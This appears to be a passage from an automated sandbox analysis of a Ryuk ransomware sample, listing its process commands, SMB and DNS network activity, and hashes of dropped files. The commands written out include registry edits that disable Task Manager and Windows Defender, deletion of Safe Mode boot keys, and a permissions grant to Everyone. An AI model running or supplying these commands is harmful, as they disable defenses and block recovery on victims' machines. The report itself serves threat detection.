icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\reg.exe

reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\reg.exe

reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F

Network

Country Destination Domain Proto
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 164.113.222.173.in-addr.arpa udp
US 8.8.8.8:53 54.120.234.20.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
NL 154.61.71.13:445 tcp
N/A 10.127.0.1:445 tcp
NL 154.61.71.13:139 tcp
N/A 10.127.0.1:139 tcp
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 0.77.109.52.in-addr.arpa udp
US 8.8.8.8:53 76.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 209.143.182.52.in-addr.arpa udp

Files

C:\ProgramData\ryuk.exe

MD5 ecd9d8ef99eb9813fa4eced549ea4d88
SHA1 7db7bff4ca9e94bbfe026c2282f3ce36e423f183
SHA256 fe4547b20cf40de0e33ed545949f3e0dfef815b5add252d233177386910643a6
SHA512 2882d1b8ca5654b142e368f2bcb712bf9d8e3e096aacaf5a5f6ffb62b3062df0245db05e13bdc61ab2bd676349c751b87e8880ab034e73d6cd94e29cc165648b

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ryuk.exe

MD5 ecd9d8ef99eb9813fa4eced549ea4d88
SHA1 7db7bff4ca9e94bbfe026c2282f3ce36e423f183
SHA256 fe4547b20cf40de0e33ed545949f3e0dfef815b5add252d233177386910643a6
SHA512 2882d1b8ca5654b142e368f2bcb712bf9d8e3e096aacaf5a5f6ffb62b3062df0245db05e13bdc61ab2bd676349c751b87e8880ab034e73d6cd94e29cc165648b

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe

MD5 ecd9d8ef99eb9813fa4eced549ea4d88
SHA1 7db7bff4ca9e94bbfe026c2282f3ce36e423f183
SHA256 fe4547b20cf40de0e33ed545949f3e0dfef815b5add252d233177386910643a6
SHA512 2882d1b8ca5654b142e368f2bcb712bf9d8e3e096aacaf5a5f6ffb62b3062df0245db05e13bdc61ab2bd676349c751b87e8880ab034e73d6cd94e29cc165648b

C:\ProgramData\hrmlog1

MD5 f0206254aa436f4b295939126dc43bc2
SHA1 74b2eee424de0da9fae87196a9eee619ee8cfc83
SHA256 4598ecf84bd6d3187e87536d6dc572d706266babd9e70fc6f56b0030de6b5d66
SHA512 035847703efab63fa27fdb166aa472a9a058cb2f5d31773b7456268eade0be53a2ee072f1f94ea8c6a7667fefc7acecaaf34faffe7362398577e3e3389a38321

C:\Users\Admin\AppData\Local\Temp\hrmlog2

MD5 5435f8aa7f1033e7d46508270d00df70
SHA1 1b365e129fba3e7978fb12182d7dfdae1e8597a7
SHA256 838e614788a908ebb3bb8edfc5653ef4c3a5771e8e91c421f1e66e9d92cccdb3
SHA512 bf078fe60f2cd8430092e87a3490ff9ac7f52b99af9b06fb0c7415b540a281eab4204a160638aedbf4e430dec1e014e1b3208d6863f89ee575f946064a306c30

C:\Users\Admin\AppData\Local\Temp\hrmlog1

MD5 f0206254aa436f4b295939126dc43bc2
SHA1 74b2eee424de0da9fae87196a9eee619ee8cfc83
SHA256 4598ecf84bd6d3187e87536d6dc572d706266babd9e70fc6f56b0030de6b5d66
SHA512 035847703efab63fa27fdb166aa472a9a058cb2f5d31773b7456268eade0be53a2ee072f1f94ea8c6a7667fefc7acecaaf34faffe7362398577e3e3389a38321

C:\ProgramData\hrmlog1

MD5 f0206254aa436f4b295939126dc43bc2
SHA1 74b2eee424de0da9fae87196a9eee619ee8cfc83
SHA256 4598ecf84bd6d3187e87536d6dc572d706266babd9e70fc6f56b0030de6b5d66
SHA512 035847703efab63fa27fdb166aa472a9a058cb2f5d31773b7456268eade0be53a2ee072f1f94ea8c6a7667fefc7acecaaf34faffe7362398577e3e3389a38321

C:\ProgramData\hrmlog2

MD5 5435f8aa7f1033e7d46508270d00df70
SHA1 1b365e129fba3e7978fb12182d7dfdae1e8597a7
SHA256 838e614788a908ebb3bb8edfc5653ef4c3a5771e8e91c421f1e66e9d92cccdb3
SHA512 bf078fe60f2cd8430092e87a3490ff9ac7f52b99af9b06fb0c7415b540a281eab4204a160638aedbf4e430dec1e014e1b3208d6863f89ee575f946064a306c30

C:\ProgramData\hrmlog2

MD5 5435f8aa7f1033e7d46508270d00df70
SHA1 1b365e129fba3e7978fb12182d7dfdae1e8597a7
SHA256 838e614788a908ebb3bb8edfc5653ef4c3a5771e8e91c421f1e66e9d92cccdb3
SHA512 bf078fe60f2cd8430092e87a3490ff9ac7f52b99af9b06fb0c7415b540a281eab4204a160638aedbf4e430dec1e014e1b3208d6863f89ee575f946064a306c30

C:\Users\Admin\AppData\Local\Temp\RYUKID

MD5 4a612255a55cb05d467ccb54b9ff56b0
SHA1 25036eb0954767a16b8997d467ea25e2482c3968
SHA256 c4d8b3cd93a5a21c8354d1c3d1cd57d3b6575551c467ae1a726dd4eaccffceb7
SHA512 68c9e718145c467dc814cec79d1a18237ce3c042d3591bb1444c5919bd537585962511eac21a18254b59740591776b0560847dbd0af4e19a81839b47ae8f35f6

C:\ProgramData\hrmlog2

MD5 5435f8aa7f1033e7d46508270d00df70
SHA1 1b365e129fba3e7978fb12182d7dfdae1e8597a7
SHA256 838e614788a908ebb3bb8edfc5653ef4c3a5771e8e91c421f1e66e9d92cccdb3
SHA512 bf078fe60f2cd8430092e87a3490ff9ac7f52b99af9b06fb0c7415b540a281eab4204a160638aedbf4e430dec1e014e1b3208d6863f89ee575f946064a306c30

C:\ProgramData\RYUKID

MD5 4a612255a55cb05d467ccb54b9ff56b0
SHA1 25036eb0954767a16b8997d467ea25e2482c3968
SHA256 c4d8b3cd93a5a21c8354d1c3d1cd57d3b6575551c467ae1a726dd4eaccffceb7
SHA512 68c9e718145c467dc814cec79d1a18237ce3c042d3591bb1444c5919bd537585962511eac21a18254b59740591776b0560847dbd0af4e19a81839b47ae8f35f6

C:\ProgramData\hrmlog1

MD5 f0206254aa436f4b295939126dc43bc2
SHA1 74b2eee424de0da9fae87196a9eee619ee8cfc83
SHA256 4598ecf84bd6d3187e87536d6dc572d706266babd9e70fc6f56b0030de6b5d66
SHA512 035847703efab63fa27fdb166aa472a9a058cb2f5d31773b7456268eade0be53a2ee072f1f94ea8c6a7667fefc7acecaaf34faffe7362398577e3e3389a38321

C:\ProgramData\RyukReadMe.txt

MD5 82ea3d2f6fc005352ce69909570def3d
SHA1 a43c1be5adc6a957d8a4ed727c3d1d5c648b6397
SHA256 56edcf4ec31883a101939b9fb4149d4944f00be0663a4a339afbc0910ea085bc
SHA512 197d2e2e5208de3c338ecc383b0fe016c8b5148d476640b6d1a7054f9417e698070edf38376359a26d43a7c6240d0362744f8fd416d46f723d492f230af1a440

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\RyukReadMe.txt

MD5 82ea3d2f6fc005352ce69909570def3d
SHA1 a43c1be5adc6a957d8a4ed727c3d1d5c648b6397
SHA256 56edcf4ec31883a101939b9fb4149d4944f00be0663a4a339afbc0910ea085bc
SHA512 197d2e2e5208de3c338ecc383b0fe016c8b5148d476640b6d1a7054f9417e698070edf38376359a26d43a7c6240d0362744f8fd416d46f723d492f230af1a440

C:\ProgramData\RyukReadMe.html

MD5 2d581d7f41be876ce36523d0a7f2a64a
SHA1 279f1b7f8936ab44e75bec3695d68569d8bbca9e
SHA256 53c9308d8e9a7949f9348038493d87aa1218a148f404a7c340f7d47525ea90dd
SHA512 4caf790b2d8feb5b2e9bab0ede191cff81a1547221408255e17e5e549a1fcd3615ea502d6d55b843c50a0eeac0bad13a2261d03f8b580ce6a592298340071c53